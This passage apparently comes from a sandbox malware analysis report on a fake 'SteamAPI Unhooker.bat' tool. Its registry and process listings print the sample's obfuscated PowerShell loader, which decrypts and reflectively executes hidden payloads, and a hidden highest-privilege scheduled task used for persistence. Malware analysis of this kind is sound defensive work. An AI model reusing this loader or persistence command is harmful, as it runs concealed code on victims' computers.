| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a594b7f639e26c4083b3b0da538f62c100000000020000000000106600000001000020000000a59dce574ee25ff3324104052cb0fb4c4400f6a1cf6b72f3104f3658d2e209b7000000000e8000000002000020000000302069aabebc50f1f1c6df89889f3b83b6dea1a4cd45b764e0fce9e8d50e7626b0030000eaa297cefbce61ae5dad83bcbbe5a50aff05cf1606c59668fd6d8fa1b86d110d6ba1140697fe421202236de9d48f07e9a9722e417202b6e92320b11e59b0546ba712ac3711ad672acaf5537b99e57a28004438293b0c47e077c73fa80890805ffc10a19a8496f1957a76f7cee9cae57de6a672038c0506c19e18e1a75628713529f88f03f70d68a50bca13107e78aee49153612f249d7c3b9f1a8fc13a13eebc6efe8190600bcd5875d41aa17dfd5c1b0992503dd808334b2fb748353c80e5baca1cd5725dab3be1eed9e04f48381b738a889714561667bc730afa94dea2b9413e70625c9b738df60c0148e667bb0dbfe809a05ffd99e3ca5faf31294cdc1026e51f1ea5b6debbd5b2d51ee98aaddbb42e0dfa3ead14e0f3e5942305a8b629e7ba26919d6573aae2569d254921e1d94fc79cfc84d67528484028603ec530769aa1d1b796e7e4c34ad8e17425eb5002ee0414aa7c7e4ebb16d9c565cbc438208f940dcb0394a09c14922594bc43b1bcfc8ce3270ce484d6e54917a37e4248b54ba15d77b3f64f974c5e41477327fbe0dcf42eff9bd9260a014ad1c97c3220ac5c2f3174a4e3d76a462d60641d001de96b318c460e05b662f506558529328fcc68989453c96fb87833f97bc394c98fe62fc81df6f24dfa4d7606a3971d388d9f656616193610fe3e018a6673c574ae404c61cb55e944583ba58a0820ca9e9ac2cf2dc99dba31e1fdebd4ad50af4a71f7090763f42647c4a76910be5550de13bdf5370b3fee7d19278a5f2c50d4d482383cf850a0e65af1b4324085444512f26cce64d666b27712210c433bec2c813327420fa8ec10e1832fb54aeb7284b9192225f463cb3caed6e45a5edc1ce4387f4881612536db71026c8de5341c657fce8e1d6f7c972cc866f8d19870e4c9ddedac1c8af68545b9bb356ed84e9257ed56c91373b8486b701c1d6cc5274011b440438aa1b92694b0670006cb6de40ce5491b9cc9302d98559c6b4650768f857b0facd436413da69f57f89257ced91e0943068c9e136aeed18d556100d885293bd463d743bb04bf8d2620745a7f3bf7323489210c02d53149f222ed03e8470990c7968a3dca0f92bf5139812e9c611cc2d55e779497e5668eefed256f3c090b9a801d99e0461320eda6b2184d719a71d07fd6f4262d8c2afb9adbd7ed6691cc32da978f60145801c92e4a099145cb371a598e2f3f32af36ad5ce41f364dedb22e55e0c40249b295e44e2140f298a9d1ef254903a5ebbde61dff9508944e02d233cb063ac7586f8bdf7d4c2b4fe92908ce9e5044affac589024ffb1917dfdd4c5a3969bc400000001bd7a8b6cc92c33ce0e1a252b593d5ecc20848034234ac474681a21e434c8764e80a5219f631a29dd3f724ad2efad6c27c18eb715294df93878010ac75598a9c | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C00DBE6209BC = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a594b7f639e26c4083b3b0da538f62c100000000020000000000106600000001000020000000112c727405f240a1da61d60f9e27af019d7d4d860dd2b658c0fd3aa88cf492b1000000000e8000000002000020000000f6a72f4d191f72b06e905185faea283faada2885bdab82d7cf3825b26f2e186480000000c92bceadf8193ce4ad1d8ed76033613a9ddbac50236545abcde2eababff4e2aff9f96c2f0778a296ea1f0188424f10df4dcd26af8180a0b2cf28866b280204113a9967f3bd842aaf5c0b3fb90eb8a27b26d2c8fab67944d8727d7290c657e3af017eabf935e3dabe03a957ad8636c775ee4a5fe0489bc5780c1d5422c0f45526400000005719e6cc82f56a93b1915eaca8bd209d1402a795f098cb4287bf810d668fde1c3bdb4a386dd06e20180c4822b720fe89d446bac64009ed4d4841507b1b88f5c6 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DBE6209BC" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={87747806-79BC-4BD0-BFF7-671EF04662E1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C00DBE6209BC" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_482_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_482.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 45d5507cdde13df5dcbf5d39d52cb1d6 wh1WZjrFrUKS2LjuEUgWPg.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_482.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_482.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_482.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_482.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
